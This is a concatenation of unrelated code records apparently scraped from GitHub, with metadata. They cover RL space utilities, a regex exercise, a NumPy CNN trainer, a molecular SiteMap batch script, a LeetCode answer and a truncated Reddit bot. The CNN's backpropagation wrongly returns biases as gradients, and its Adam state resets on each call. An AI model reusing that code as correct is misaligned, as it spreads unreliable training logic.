Special case for Ints:\n # If another key exists, with the name: `_num_[key]` -> take num_categories from that key's value.\n #if key[:5] == \"_num_\":\n # continue\n #num_categories = data.get(\"_num_{}\".format(key))\n\n num_categories = num_categories.get(key, None) if isinstance(num_categories, dict) else num_categories\n spec[key] = get_space_from_data(value, num_categories=num_categories, main_axes=main_axes)\n # Return\n if spec[key] == 0:\n return 0\n return Dict(spec, main_axes=main_axes)\n # Tuple.\n elif isinstance(data, tuple):\n spec = []\n for i in data:\n space = get_space_from_data(i, main_axes=main_axes)\n if space == 0:\n return 0\n spec.append(space)\n return Tuple(spec, main_axes=main_axes)\n # Primitive Space -> Infer from data dtype and shape.\n else:\n # `data` itself is a single value, simple python type.\n if isinstance(data, int):\n int_high = {\"high\": num_categories} if num_categories is not None else {}\n return PrimitiveSpace.make(spec=type(data), shape=(), **int_high)\n elif isinstance(data, (bool, float)):\n return PrimitiveSpace.make(spec=type(data), shape=())\n elif isinstance(data, str):\n raise SurrealError(\"Cannot derive Space from str data ({})!\".format(data))\n # A single numpy array.\n elif isinstance(data, (np.ndarray, tf.Tensor)):\n dtype = convert_dtype(data.dtype, \"np\")\n int_high = {\"high\": num_categories} if num_categories is not None and \\\n dtype in [np.uint8, np.int16, np.int32, np.int64] else {}\n # Must subtract main_axes from beginning of data.shape.\n shape = tuple(data.shape[len(main_axes or []):])\n return PrimitiveSpace.make(\n spec=dtype, shape=shape, main_axes=main_axes, **int_high\n )\n # Try inferring the Space from a python list.\n elif isinstance(data, list):\n return try_space_inference_from_list(data)\n # No Space: e.g. the tf.no_op, a distribution (anything that's not a tensor).\n # PyTorch Tensors do not have get_shape so must check backend.\n elif hasattr(data, \"dtype\") is False or not hasattr(data, \"get_shape\"):\n return 0\n\n raise SurrealError(\"ERROR: Cannot derive Space from data '{}' (unknown type?)!\".format(data))\n\n\ndef sanity_check_space(\n space, allowed_types=None, allowed_sub_types=None, non_allowed_types=None, non_allowed_sub_types=None,\n must_have_batch_rank=None, must_have_time_rank=None, must_have_batch_or_time_rank=False,\n must_have_categories=None, num_categories=None,\n must_have_lower_limit=None, must_have_upper_limit=None,\n rank=None, shape=None\n):\n \"\"\"\n Sanity checks a given Space for certain criteria and raises exceptions if they are not met.\n\n Args:\n space (Space): The Space object to check.\n allowed_types (Optional[List[type]]): A list of types that this Space must be an instance of.\n\n allowed_sub_types (Optional[List[type]]): For container core, a list of sub-types that all\n flattened sub-Spaces must be an instance of.\n\n non_allowed_types (Optional[List[type]]): A list of type that this Space must not be an instance of.\n\n non_allowed_sub_types (Optional[List[type]]): For container core, a list of sub-types that all\n flattened sub-Spaces must not be an instance of.\n\n must_have_batch_rank (Optional[bool]): Whether the Space must (True) or must not (False) have the\n `has_batch_rank` property set to True. None, if it doesn't matter.\n\n must_have_time_rank (Optional[bool]): Whether the Space must (True) or must not (False) have the\n `has_time_rank` property set to True. 
None, if it doesn't matter.\n\n must_have_batch_or_time_rank (Optional[bool]): Whether the Space must (True) or must not (False) have either\n the `has_batch_rank` or the `has_time_rank` property set to True.\n\n must_have_categories (Optional[bool]): For IntBoxes, whether the Space must (True) or must not (False) have\n global bounds with `num_categories` > 0. None, if it doesn't matter.\n\n num_categories (Optional[int,tuple]): An int or a tuple (min,max) range within which the Space's\n `num_categories` rank must lie. Only valid for IntBoxes.\n None if it doesn't matter.\n\n must_have_lower_limit (Optional[bool]): If not None, whether this Space must have a lower limit.\n must_have_upper_limit (Optional[bool]): If not None, whether this Space must have an upper limit.\n\n rank (Optional[int,tuple]): An int or a tuple (min,max) range within which the Space's rank must lie.\n None if it doesn't matter.\n\n shape (Optional[tuple[int]]): A tuple of ints specifying the required shape. None if it doesn't matter.\n\n Raises:\n RLGraphSpaceError: If any of the conditions is not met.\n \"\"\"\n flattened_space = space.flatten()\n\n # Check the types.\n if allowed_types is not None:\n if not isinstance(space, force_tuple(allowed_types)):\n raise SurrealSpaceError(\n space, \"ERROR: Space ({}) is not an instance of {}!\".format(space, allowed_types)\n )\n\n if allowed_sub_types is not None:\n for flat_key, sub_space in flattened_space.items():\n if not isinstance(sub_space, force_tuple(allowed_sub_types)):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: sub-Space '{}' ({}) is not an instance of {}!\".\n format(flat_key, sub_space, allowed_sub_types)\n )\n\n if non_allowed_types is not None:\n if isinstance(space, force_tuple(non_allowed_types)):\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) must not be an instance of {}!\".format(space, non_allowed_types)\n )\n\n if non_allowed_sub_types is not None:\n for flat_key, sub_space in flattened_space.items():\n if isinstance(sub_space, force_tuple(non_allowed_sub_types)):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: sub-Space '{}' ({}) must not be an instance of {}!\".\n format(flat_key, sub_space, non_allowed_sub_types)\n )\n\n if must_have_batch_or_time_rank is True:\n if space.has_batch_rank is False and space.has_time_rank is False:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) does not have a batch- or a time-rank, but must have either one of \"\n \"these!\".format(space)\n )\n\n if must_have_batch_rank is not None:\n if (space.has_batch_rank is False and must_have_batch_rank is True) or \\\n (space.has_batch_rank is not False and must_have_batch_rank is False):\n # Last chance: Check for rank >= 2, that would be ok as well.\n if must_have_batch_rank is True and len(space.get_shape(main_axes=\"B\")) >= 2:\n pass\n # Something is wrong.\n elif space.has_batch_rank is not False:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) has a batch rank, but is not allowed to!\".format(space)\n )\n else:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) does not have a batch rank, but must have one!\".format(space)\n )\n\n if must_have_time_rank is not None:\n if (space.has_time_rank is False and must_have_time_rank is True) or \\\n (space.has_time_rank is not False and must_have_time_rank is False):\n # Last chance: Check for rank >= 3, that would be ok as well.\n if must_have_time_rank is True and len(space.get_shape(main_axes=[\"B\", \"T\"])) >= 2:\n pass\n # Something is wrong.\n elif space.has_time_rank is 
not False:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) has a time rank, but is not allowed to!\".format(space)\n )\n else:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) does not have a time rank, but must have one!\".format(space)\n )\n\n if must_have_categories is not None:\n for flat_key, sub_space in flattened_space.items():\n if not isinstance(sub_space, Int):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) is not an Int. Only Int Spaces can have categories!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n elif sub_space.global_bounds is False:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must have categories (globally valid value bounds)!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n\n if must_have_lower_limit is not None:\n for flat_key, sub_space in flattened_space.items():\n low = sub_space.low\n if must_have_lower_limit is True and (low == -LARGE_INTEGER or low == float(\"-inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must have a lower limit, but has none!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n elif must_have_lower_limit is False and (low != -LARGE_INTEGER and low != float(\"-inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must not have a lower limit, but has one ({})!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space, low)\n )\n\n if must_have_upper_limit is not None:\n for flat_key, sub_space in flattened_space.items():\n high = sub_space.high\n if must_have_upper_limit is True and (high != LARGE_INTEGER and high != float(\"inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must have an upper limit, but has none!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n elif must_have_upper_limit is False and (high == LARGE_INTEGER or high == float(\"inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must not have a upper limit, but has one ({})!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space, high)\n )\n\n if rank is not None:\n if isinstance(rank, int):\n for flat_key, sub_space in flattened_space.items():\n if sub_space.rank != rank:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has rank {}, but must have rank \"\n \"{}!\".format(flat_key, space, sub_space.rank, rank)\n )\n else:\n for flat_key, sub_space in flattened_space.items():\n if not ((rank[0] or 0) <= sub_space.rank <= (rank[1] or float(\"inf\"))):\n raise SurrealSpaceError(\n\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has rank {}, but its rank must be between {} and \"\n \"{}!\".format(flat_key, space, sub_space.rank, rank[0], rank[1])\n )\n\n if shape is not None:\n for flat_key, sub_space in flattened_space.items():\n if sub_space.shape != shape:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has shape {}, but its shape must be \"\n \"{}!\".format(flat_key, space, sub_space.get_shape(), shape)\n )\n\n if num_categories is not None:\n for flat_key, sub_space in flattened_space.items():\n if not isinstance(sub_space, Int):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' is not an Int. 
Only Int Spaces can have \"\n \"categories!\".format(flat_key, space)\n )\n elif isinstance(num_categories, int):\n if sub_space.num_categories != num_categories:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has `num_categories` {}, but must have {}!\".\n format(flat_key, space, sub_space.num_categories, num_categories)\n )\n elif not ((num_categories[0] or 0) <= sub_space.num_categories <= (num_categories[1] or float(\"inf\"))):\n raise SurrealSpaceError(sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has `num_categories` {}, but this value must be between \"\n \"{} and {}!\".format(flat_key, space, sub_space.num_categories, num_categories[0], num_categories[1])\n )\n\n\ndef check_space_equivalence(space1, space2):\n \"\"\"\n Compares the two input Spaces for equivalence and returns the more generic Space of the two.\n The more generic Space is the one that has the properties has_batch_rank and/or has _time_rank set (instead of\n hard values in these ranks).\n E.g.: Float((64,)) is equivalent with Float((), +batch-rank). The latter will be returned.\n\n NOTE: Float((2,)) and Float((3,)) are NOT equivalent.\n\n Args:\n space1 (Space): The 1st Space to compare.\n space2 (Space): The 2nd Space to compare.\n\n Returns:\n Union[Space,False]: False is the two core are not equivalent. The more generic Space of the two if they are\n equivalent.\n \"\"\"\n # Spaces are the same: Return one of them.\n if space1 == space2:\n return space1\n # One has batch-rank, the other doesn't, but has one more rank.\n elif space1.has_batch_rank and not space2.has_batch_rank and \\\n (np.asarray(space1.rank) == np.asarray(space2.rank) - 1).all():\n return space1\n elif space2.has_batch_rank and not space1.has_batch_rank and \\\n (np.asarray(space2.rank) == np.asarray(space1.rank) - 1).all():\n return space2\n # TODO: time rank?\n\n return False\n\n\ndef try_space_inference_from_list(list_op):\n \"\"\"\n Attempts to infer shape space from a list op. 
A list op may be the result of fetching state from a Python\n memory.\n\n Args:\n list_op (list): List with arbitrary sub-structure.\n\n Returns:\n Space: Inferred Space object represented by list.\n \"\"\"\n shape = len(list_op)\n if shape > 0:\n # Try to infer more things by looking inside list.\n elem = list_op[0]\n if isinstance(elem, tf.Tensor):\n list_type = elem.dtype\n inner_shape = elem.shape\n return PrimitiveSpace.make(spec=convert_dtype(list_type, \"np\"), shape=(shape,) + inner_shape,\n add_batch_rank=True)\n elif isinstance(elem, list):\n inner_shape = len(elem)\n return PrimitiveSpace.make(spec=convert_dtype(float, \"np\"), shape=(shape, inner_shape),\n add_batch_rank=True)\n elif isinstance(elem, int):\n # In case of missing comma values, check all other items in list for float.\n # If one float in there -> Float, otherwise -> Int.\n has_floats = any(isinstance(el, float) for el in list_op)\n if has_floats is False:\n return Int.make(shape=(shape,), add_batch_rank=True)\n else:\n return Float.make(shape=(shape,), add_batch_rank=True)\n elif isinstance(elem, float):\n return Float.make(shape=(shape,), add_batch_rank=True)\n else:\n # Most general guess is a Float box.\n return Float(shape=(shape,))\n\n\ndef get_default_distribution_from_space(\n space, *, num_mixture_experts=0, bounded_distribution_type=\"beta\",\n discrete_distribution_type=\"categorical\", gumbel_softmax_temperature=1.0\n):\n \"\"\"\n Args:\n space (Space): The primitive Space for which to derive a default distribution spec.\n\n num_mixture_experts (int): If > 0, use a mixture distribution over the determined \"base\"-distribution using n\n experts. TODO: So far, this only works for continuous distributions.\n\n bounded_distribution_type (str): The lookup class string for a bounded Float distribution.\n Default: \"beta\".\n\n discrete_distribution_type(str): The class of distributions to use for discrete action core. For options\n check the components.distributions package. Default: categorical. Agents requiring reparameterization\n may require a GumbelSoftmax distribution instead.\n\n gumbel_softmax_temperature (float): Temperature parameter for the Gumbel-Softmax distribution used\n for discrete actions.\n\n Returns:\n Dict: A Spec dict, from which a valid default distribution object can be created.\n \"\"\"\n # Int: Categorical.\n if isinstance(space, Int):\n assert discrete_distribution_type in [\"gumbel-softmax\", \"categorical\"]\n if discrete_distribution_type == \"gumbel-softmax\":\n return dict(type=\"gumbel-softmax\", temperature=gumbel_softmax_temperature)\n else:\n return dict(type=discrete_distribution_type)\n\n # Bool: Bernoulli.\n elif isinstance(space, Bool):\n return dict(type=\"bernoulli\")\n\n # Continuous action space: Normal/Beta/etc. 
distribution.\n elif isinstance(space, Float):\n # Unbounded -> Normal distribution.\n if not is_bounded_space(space):\n single = dict(type=\"normal\")\n # Bounded -> according to the bounded_distribution parameter.\n else:\n assert bounded_distribution_type in [\"beta\", \"squashed-normal\"]\n single = dict(type=bounded_distribution_type, low=space.low, high=space.high)\n\n # Use a mixture distribution?\n if num_mixture_experts > 0:\n return dict(type=\"mixture\", _args=single, num_experts=num_mixture_experts)\n else:\n return single\n\n # Container Space.\n elif isinstance(space, ContainerSpace):\n return dict(\n type=\"joint-cumulative\",\n distributions=tf.nest.pack_sequence_as(space.structure, tf.nest.map_structure(lambda s: get_default_distribution_from_space(s), tf.nest.flatten(space)))\n )\n else:\n raise SurrealError(\"No distribution defined for space {}!\".format(space))\n\n\ndef is_bounded_space(box_space):\n if not isinstance(box_space, Float):\n return False\n # Unbounded.\n if box_space.low == float(\"-inf\") and box_space.high == float(\"inf\"):\n return False\n # Bounded.\n elif box_space.low != float(\"-inf\") and box_space.high != float(\"inf\"):\n return True\n # TODO: Semi-bounded -> Exponential distribution.\n else:\n raise SurrealError(\n \"Semi-bounded core for distribution-generation are not supported yet! You passed in low={} high={}.\".\n format(box_space.low, box_space.high)\n )\n","repo_name":"ducandu/surreal","sub_path":"surreal/spaces/space_utils.py","file_name":"space_utils.py","file_ext":"py","file_size_in_byte":22267,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"15140857611","text":"import re\n\nwhile True:\n input_text = input()\n if len(input_text) != 0:\n match_pattern = re.compile(r'\\d+')\n matches = match_pattern.finditer(input_text)\n for match in matches:\n print(match.group(0), end=' ')\n else:\n break","repo_name":"radoslav-petkov/SoftUni---Fundamentals---Python---2022","sub_path":"25.Regular Expressions - Exercise/01. Capture the Numbers.py","file_name":"01. 
Capture the Numbers.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"44363882427","text":"import numpy as np\n\nfrom CNN.layers import convolutional_layer, maxpool_layer, loss_function, softmax, backpropagation_maxpool, backpropagation_convolutionalLayer\n\n\ndef build_net(image, label, parameters, stride, pooling_filter, pooling_stride):\n [weight1, weight2, weight3, weight4, bias1, bias2, bias3, bias4] = parameters\n\n #forward propagation\n first_convolution = convolutional_layer(image, weight1, bias1, stride)\n first_convolution[first_convolution <= 0] = 0\n\n second_convolution = convolutional_layer(first_convolution, weight2, bias2, stride)\n second_convolution[second_convolution <= 0] = 0\n\n pooling_layer = maxpool_layer(second_convolution, pooling_filter, pooling_stride)\n\n (num_filters, height_width, same) = pooling_layer.shape\n\n flatten = pooling_layer.reshape((num_filters * height_width * height_width, 1))\n\n fully_connected1 = weight3.dot(flatten) + bias3\n fully_connected1[fully_connected1 <= 0] = 0\n\n fully_connected2 = weight4.dot(fully_connected1) + bias4\n\n prediction = softmax(fully_connected2)\n\n loss = loss_function(prediction, label)\n\n #backpropagation\n derivative_second_fully_conn = prediction - label\n gradient_weight4 = derivative_second_fully_conn.dot(fully_connected1.T)\n gradient_bias4 = np.sum(derivative_second_fully_conn, axis=1).reshape(bias4.shape)\n\n derivative_first_fully_conn = weight4.T.dot(derivative_second_fully_conn)\n derivative_first_fully_conn[fully_connected1 <= 0] = 0\n gradient_weight3 = derivative_first_fully_conn.dot(flatten.T)\n gradient_bias3 = np.sum(derivative_first_fully_conn, axis=1).reshape(bias3.shape)\n\n der_second_fc = weight3.T.dot(derivative_first_fully_conn)\n der_maxpool = der_second_fc.reshape(pooling_layer.shape)\n\n der_conv2 = backpropagation_maxpool(der_maxpool, second_convolution, pooling_filter, pooling_stride)\n der_conv2[second_convolution <= 0] = 0\n\n der_conv1, gradient_weight2, der_bias2 = backpropagation_convolutionalLayer(der_conv2, first_convolution, weight2, stride)\n der_conv1[first_convolution <= 0] = 0\n\n image_der, gradient_weight1, der_bias1 = backpropagation_convolutionalLayer(der_conv1, image, weight1, stride)\n\n gradients = [gradient_weight1, gradient_weight2, gradient_weight3, gradient_weight4, bias1, bias2, bias3, bias4]\n return gradients, loss\n\n\n# Adams optimizer\n\ndef adam_optimizer(batch, num_classes, alpha, dim, n_c, beta1, beta2, parameters, cost_array, E=1e-7):\n\n [weight1, weight2, weight3, weight4, bias1, bias2, bias3, bias4] = parameters\n\n batch_size = len(batch)\n\n images = batch[:, 0:-1]\n images = images.reshape((batch_size, n_c, dim, dim))\n\n labels = batch[:, -1]\n\n cost = 0\n\n # initialize gradients with zeros\n grad_w1 = np.zeros(weight1.shape)\n grad_w2 = np.zeros(weight2.shape)\n grad_w3 = np.zeros(weight3.shape)\n grad_w4 = np.zeros(weight4.shape)\n grad_b1 = np.zeros(bias1.shape)\n grad_b2 = np.zeros(bias2.shape)\n grad_b3 = np.zeros(bias3.shape)\n grad_b4 = np.zeros(bias4.shape)\n\n # initialize momentum parameters with zeros\n moment_param_w1 = np.zeros(weight1.shape)\n moment_param_w2 = np.zeros(weight2.shape)\n moment_param_w3 = np.zeros(weight3.shape)\n moment_param_w4 = np.zeros(weight4.shape)\n moment_param_b1 = np.zeros(bias1.shape)\n moment_param_b2 = np.zeros(bias2.shape)\n moment_param_b3 = np.zeros(bias3.shape)\n moment_param_b4 = 
np.zeros(bias4.shape)\n\n # initialize RMS-prop parameters with zeros\n rmsprop_w1 = np.zeros(weight1.shape)\n rmsprop_w2 = np.zeros(weight2.shape)\n rmsprop_w3 = np.zeros(weight3.shape)\n rmsprop_w4 = np.zeros(weight4.shape)\n rmsprop_b1 = np.zeros(bias1.shape)\n rmsprop_b2 = np.zeros(bias2.shape)\n rmsprop_b3 = np.zeros(bias3.shape)\n rmsprop_b4 = np.zeros(bias4.shape)\n\n\n for i in range(batch_size):\n image = images[i]\n label = np.eye(num_classes)[int(labels[i])].reshape((num_classes, 1))\n\n gradients, loss = build_net(image, label, parameters, 1, 2, 2)\n\n [gradient_weight1, gradient_weight2, gradient_weight3, gradient_weight4, bias1, bias2, bias3, bias4] = gradients\n\n grad_w1 += gradient_weight1\n grad_w2 += gradient_weight2\n grad_w3 += gradient_weight3\n grad_w4 += gradient_weight4\n grad_b1 += bias1\n grad_b2 += bias2\n grad_b3 += bias3\n grad_b4 += bias4\n\n cost += loss\n\n # update momentum and RMS-prop parameters\n moment_param_w1 = beta1 * moment_param_w1 + (1 - beta1) * grad_w1 / batch_size\n rmsprop_w1 = beta2 * rmsprop_w1 + (1 - beta2) * (grad_w1 / batch_size) ** 2\n weight1 -= alpha * moment_param_w1 / np.sqrt(rmsprop_w1 + E)\n\n moment_param_w2 = beta1 * moment_param_w2 + (1 - beta1) * grad_w2 / batch_size\n rmsprop_w2 = beta2 * rmsprop_w2 + (1 - beta2) * (grad_w2 / batch_size) ** 2\n weight2 -= alpha * moment_param_w2 / np.sqrt(rmsprop_w2 + E)\n\n moment_param_w3 = beta1 * moment_param_w3 + (1 - beta1) * grad_w3 / batch_size\n rmsprop_w3 = beta2 * rmsprop_w3 + (1 - beta2) * (grad_w3 / batch_size) ** 2\n weight3 -= alpha * moment_param_w3 / np.sqrt(rmsprop_w3 + E)\n\n moment_param_w4 = beta1 * moment_param_w4 + (1 - beta1) * grad_w4 / batch_size\n rmsprop_w4 = beta2 * rmsprop_w4 + (1 - beta2) * (grad_w4 / batch_size) ** 2\n weight4 -= alpha * moment_param_w4 / np.sqrt(rmsprop_w4 + E)\n\n moment_param_b1 = beta1 * moment_param_b1 + (1 - beta1) * grad_b1 / batch_size\n rmsprop_b1 = beta2 * rmsprop_b1 + (1 - beta2) * (grad_b1 / batch_size) ** 2\n bias1 -= alpha * moment_param_b1 / np.sqrt(rmsprop_b1 + E)\n\n moment_param_b2 = beta1 * moment_param_b2 + (1 - beta1) * grad_b2 / batch_size\n rmsprop_b2 = beta2 * rmsprop_b2 + (1 - beta2) * (grad_b2 / batch_size) ** 2\n bias2 -= alpha * moment_param_b2 / np.sqrt(rmsprop_b2 + E)\n\n moment_param_b3 = beta1 * moment_param_b3 + (1 - beta1) * grad_b3 / batch_size\n rmsprop_b3 = beta2 * rmsprop_b3 + (1 - beta2) * (grad_b3 / batch_size) ** 2\n bias3 -= alpha * moment_param_b3 / np.sqrt(rmsprop_b3 + E)\n\n moment_param_b4 = beta1 * moment_param_b4 + (1 - beta1) * grad_b4 / batch_size\n rmsprop_b4 = beta2 * rmsprop_b4 + (1 - beta2) * (grad_b4 / batch_size) ** 2\n bias4 -= alpha * moment_param_b4 / np.sqrt(rmsprop_b4 + E)\n\n cost = cost / batch_size\n cost_array.append(cost)\n\n parameters = [weight1, weight2, weight3, weight4, bias1, bias2, bias3, bias4]\n\n return parameters, cost_array","repo_name":"DayanaPankova/Shut-Down-My-PC-When-I-Fall-Asleep-","sub_path":"CNN/build_net.py","file_name":"build_net.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22256773793","text":"import glob\nfrom prody import *\nimport numpy as np\nimport os\nimport time\nimport subprocess\nimport argparse\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.cluster.hierarchy import dendrogram, linkage, cophenet, fcluster \nfrom scipy.spatial.distance import pdist\nimport pickle\n\nschrodinger_path = 
'/data/general_software/schrodinger2019-1'\n\ndef parserfunc():\n parser = argparse.ArgumentParser(\n description ='Given a directory with mae files, redactar blablabla')\n\n parser.add_argument('-d', dest=\"maedir\", help = \"MAEs directory\", required=True)\n parser.add_argument('-o', dest=\"outdir\", help = \"Output directory\", required=True)\n \n args = parser.parse_args()\n return args\n\ndef siteMap(maes,asl,delimiter=None,outfmt='mae',max_processes=4):\n \"\"\"\n Run a SiteMap calculation for a list of MAEs (can't be pdbs).\n maes: 'list'. MAE list of elements\n asl: 'str'. ASL (atom specification Language)\n delimiter: 'str'. Delimiter to obtain an identifier from each MAE name\n outfmt: 'str'. Outfile format. Either .mae or .pdb\n max_processes: Number of processors used to paralalize the different executions\n \"\"\"\n MAEnames = [os.path.basename(mae) for mae in maes]\n if delimiter != None:\n IDs = [ maename.replace(\".mae\",\"\").split(delimiter)[0] for maename in MAEnames]\n else:\n IDs = [ maename.replace(\".mae\",\"\") for maename in MAEnames]\n\n cmd_SiteMap = ['%s/sitemap -j %s -prot %s -sitebox 12 -resolution standard -reportsize 20 -writestructs no -writevis yes -maxsites 1 -siteasl \"%s\" -WAIT'%(schrodinger_path,IDs[i],mae,asl) for i,mae in enumerate(maes)]\n cmd_SiteMap = [cmd.replace(\"//\",\"/\") for cmd in cmd_SiteMap]\n\n processes = set()\n\n for cmd in cmd_SiteMap:\n print(cmd)\n processes.add(subprocess.Popen(cmd,shell=True))\n for p in processes:\n p.wait()\n if p.wait() != 0:\n print(\"There was an error\")\n\ndef _clean_siteMap(outdir,outfmt='maegz'):\n \"\"\"\n Move the SiteMap output to an specified directory\n outdir: 'str'. Output directory\n outfmt: 'str'. Outfile format of the PrepWizard. Either .mae or .pdb\n \"\"\"\n\n if outfmt != 'maegz':\n raise ValueError('outfmt must be maegz')\n os.system('mv *.%s %s'%(outfmt,outdir))\n logdir = '%s/logs'%outdir\n logdir = logdir.replace('//','/')\n if not os.path.isdir(logdir):\n os.system('mkdir %s'%logdir)\n os.system('mv *.vis %s'%logdir)\n os.system('mv *.smap %s'%logdir)\n os.system('mv *.log %s'%logdir)\n\ndef _group_siteMap(sites,out,outdir):\n \"\"\"\n Group all volume sites from SiteMap into a single mae file\n sites:\n out:\n outdir:\n \"\"\"\n conc_sites = ''\n for site in sites:\n conc_sites = conc_sites + ' ' + site\n\n cmd = '%s/utilities/structcat -imae %s -omae %s'%(schrodinger_path,conc_sites,out)\n cmd = cmd.replace('//','/')\n print(cmd)\n os.system(cmd)\n try:\n aux = 'mv %s %s'%(out,outdir)\n os.system(aux)\n except:\n print('wrong outdir')\n\ndef _uncompress_maegz(inp):\n \"\"\"\n inp:\n \"\"\"\n out = inp.replace('.maegz','.mae')\n cmd = '%s/utilities/structcat -imae %s -omae %s'%(schrodinger_path,inp,out)\n cmd = cmd.replace('//','/')\n print(cmd)\n os.system(cmd)\n\ndef get_volumeOverlapMatrix(sites,out,max_processes=4):\n \"\"\"\n Generate pairwise volume overlap matrix\n sites: 'str'. single file containing multiple SitMap files\n \"\"\"\n cmd = '%s/run volume_cluster.py -j %s -HOST localhost:%d -sc -r 2 %s'%(schrodinger_path,out,max_processes,sites)\n cmd = cmd.replace('//','/')\n print(cmd)\n p = subprocess.Popen(cmd, shell=True)\n p.wait()\n if p.wait() != 0:\n print(\"There was an error\")\n \n\ndef _clean_volumeMatrix(out,coutdir):\n \"\"\"\n Move the VolumeMatrix output to an specified directory\n out: 'str'\n outdir: 'str'. 
Output directory\n \"\"\"\n if not os.path.isdir(coutdir):\n os.system('mkdir %s'%coutdir)\n\n os.system('mv *.csv %s'%(coutdir))\n logdir = '%s/logs/'%coutdir\n logdir = logdir.replace('//','/')\n if not os.path.isdir(logdir):\n os.system('mkdir %s'%logdir)\n os.system('mv *.mae %s'%logdir)\n os.system('mv *.log %s'%logdir)\n\n\n\nif __name__ == '__main__':\n arg = parserfunc()\n inpdir = arg.maedir\n outdir = arg.outdir\n\n # create output directory\n if not os.path.isdir('%s/siteMap'%outdir):\n os.system('mkdir %s/siteMap'%outdir)\n\n # Compute the volume of each target specific binding site\n print(\"\\n-------------RUNNING SITEMAP----------------\\n\")\n TARGs = glob.glob('%s/*_prep.mae'%(inpdir))\n siteMap(maes=TARGs,asl = \"(res.num 145) AND ((atom.ptype \\' HB2 \\'))\",delimiter='_prep',outfmt='mae',max_processes=30)\n _clean_siteMap(outdir='%s/siteMap'%(outdir))\n sites = glob.glob('%s/siteMap/*_out.maegz'%outdir)\n _group_siteMap(sites=sites,out='Mpro_sites.maegz',outdir='%s/siteMap/'%outdir)\n _uncompress_maegz(inp='%s/siteMap/Mpro_sites.maegz'%outdir)\n\n # Find targets without binding site arround the specified atom\n print(\"\\n--------------CHECK STEP--------------------\\n\")\n print(\"These targets do not have the binding site around the specified atom. Please, remove them for further analysis:\")\n TARGs_IDs = [os.path.basename(TARG).split('_')[1] for TARG in TARGs]\n sites_IDs = [os.path.basename(site).split('_')[1] for site in sites]\n print(set(TARGs_IDs)-set(sites_IDs))\n\n # Get the volume overlapping matrix of the target sites\n print(\"\\n-----------VOLUME OVERLAPPING MATRIX----------\\n\")\n get_volumeOverlapMatrix(sites='%s/siteMap/Mpro_sites.maegz'%(outdir),out='Mpro_volumeMatrix',max_processes=4)\n _clean_volumeMatrix(out='Mpro_volumeMatrix',coutdir='%s/volumeMatrix/'%(outdir))\n\n\n","repo_name":"juliavilmor/Mpro","sub_path":"scripts/targetanalysis/volume_sitemap.py","file_name":"volume_sitemap.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5300891552","text":"\"\"\"\nGiven an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\n\n\n\nExample 1:\n\nInput: nums = [1,2,3,1]\nOutput: true\nExample 2:\n\nInput: nums = [1,2,3,4]\nOutput: false\nExample 3:\n\nInput: nums = [1,1,1,3,3,4,3,2,4,2]\nOutput: true\n\n\nConstraints:\n\n1 <= nums.length <= 105\n-109 <= nums[i] <= 109\n\"\"\"\nfrom typing import List\n\n\"\"\"\nSolution:\n\nfrom the concept of set in python\n\nset have unique elements\n\nso convert list to set and check both length\n\nif the length is same then no duplicate elements\n\n\n\"\"\"\n\n\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n return len(nums) != len(set(nums))\n\n\nif __name__ == '__main__':\n n = [1, 2, 3, 1]\n n2 = [1, 2, 3, 4]\n n3 = [1, 1, 1, 3, 3, 4, 3, 2, 4, 2]\n s = Solution()\n print(s.containsDuplicate(n))\n print(s.containsDuplicate(n2))\n print(s.containsDuplicate(n3))\n","repo_name":"mihirh19/Python","sub_path":"LeetCodeSolution/0217.Contains_Duplicate.py","file_name":"0217.Contains_Duplicate.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29368810985","text":"import praw\nimport os\n\nfrom enum import Enum\nfrom constants import *\n\nclass Reply(Enum):\n BASE_REPLY = 1\n\nclass AnkiHelpBot:\n responses: 
